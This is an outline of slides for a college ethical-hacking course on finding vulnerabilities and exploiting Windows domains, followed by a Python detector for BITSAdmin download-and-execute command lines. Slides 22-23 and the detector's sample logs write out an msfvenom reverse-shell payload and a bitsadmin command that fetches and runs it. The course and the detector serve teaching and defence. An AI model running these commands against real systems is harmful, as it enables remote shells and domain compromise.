CNIT 124: Advanced Ethical Hacking
Ch 6: Finding Vulnerabilities and Exploiting Domains

Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne

Course Web page:

https://samsclass.info/124/124_F17.shtml

Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1st edition (June 8, 2014)

Published in: Education
  1. CNIT 124: Advanced Ethical Hacking, Ch 6: Finding Vulnerabilities and Exploiting Domains
  2. Topics
  3. Nessus
  4. Nessus DROWN Scan
  5. Nessus DROWN Scan
  6. Nmap
  7. Two Windows Network Types
     • Workgroup
       • Small business or home
       • Less than 10 computers
     • Domain
       • Requires a server as a Domain Controller
       • Central point of administration
  8. Active Directory Domain Services
  9. Forest
  10. Forest Functional Level
  11. Active Directory Users and Computers
  12. Local Login
     • ComputerName\Username
     • Password hash stored on local C: drive
  13. Domain Login
     • DomainName\Username
     • Password hash stored on Domain Controller
  14. Group Policy
  15. Make Domain User Sally a Local Administrator
  16. GPUPDATE /FORCE
  17. Sally is an Administrator
  18. Enumerate Named Pipes
  19. ETERNALROMANCE Exploit
  20. PoC: Create C:\pwned.txt
  21. PoC: Create C:\pwned.txt
  22. Create Malware as Service EXE
     • msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/html/shell-service.exe
  23. Command Line to Download and Run Malware
     • cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe && C:\shell-service.exe
  24. Incognito
  25. Tokens
     • Like ID cards
     • Windows uses them to mark who is running each process
  26. Task Manager
  27. Direct Attack (diagram: Domain Controller, Member Server)
  28. Pivoting (diagram: Domain Controller, Member Server)
  29. Windows Firewall
  30. Scope Includes Attacker
  31. Metasploit Autoroute
  32. Member Server
  33. Incognito
  34. Impersonate Token: Become Domain Admin
  35. current_user_psexec
  36. Domain Hashes
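A defender's counterpart to slides 22 and 23, added here and not part of the slide deck: a Python detector that flags process-creation command lines in which bitsadmin /transfer fetches a file from a URL, rates the finding higher when the destination is an executable, and highest when the same command line then runs it. The log lines and their CommandLine= key/value format are constructed for this example, loosely modelled on Sysmon Event ID 1 exports.

```python
"""Detect BITSAdmin download-and-execute command lines in process-creation logs."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log lines (not captured from any real host).
SAMPLE_LOGS = [
    r"Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c bitsadmin /transfer wcb /priority high "
    r"http://172.16.1.188/shell-service.exe C:\shell-service.exe && C:\shell-service.exe",
    r"Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer updatejob "
    r"http://intranet.corp.example/patch.msu C:\Temp\patch.msu",
    r"Image=C:\Windows\System32\svchost.exe CommandLine=svchost.exe -k netsvcs",
]

EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".bat", ".ps1")

# bitsadmin /transfer <job> [/option value ...] <remote URL> <local destination>
_TRANSFER = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\s+\S+(?:\s+/\w+\s+\S+)*\s+"
    r"(?P<url>https?://\S+)\s+(?P<dest>\S+)",
    re.IGNORECASE,
)

@dataclass
class Finding:
    severity: str
    url: str
    destination: str
    executed: bool

def extract_command_line(line: str) -> str:
    """Pull the CommandLine= value out of one key=value style log line."""
    m = re.search(r"CommandLine=(.*)$", line)
    return m.group(1) if m else ""

def analyze_command_line(cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line is a BITS download, else None."""
    m = _TRANSFER.search(cmdline)
    if not m:
        return None
    url, dest = m.group("url"), m.group("dest")
    # A shell operator followed by the dropped path means download-then-run.
    tail = cmdline[m.end():]
    executed = bool(re.search(r"(?:&&|&|\|\|)\s*" + re.escape(dest), tail, re.IGNORECASE))
    drops_executable = dest.lower().endswith(EXECUTABLE_EXT)
    severity = "high" if executed else ("medium" if drops_executable else "low")
    return Finding(severity, url, dest, executed)

def scan_logs(lines: List[str]) -> List[Finding]:
    """Run the detector over every log line and collect the findings."""
    results = [analyze_command_line(extract_command_line(l)) for l in lines]
    return [f for f in results if f is not None]
```

Anything rated high is a download immediately chained into execution, which is the pattern on slide 23; a medium finding still deserves a look at what was written to the destination path.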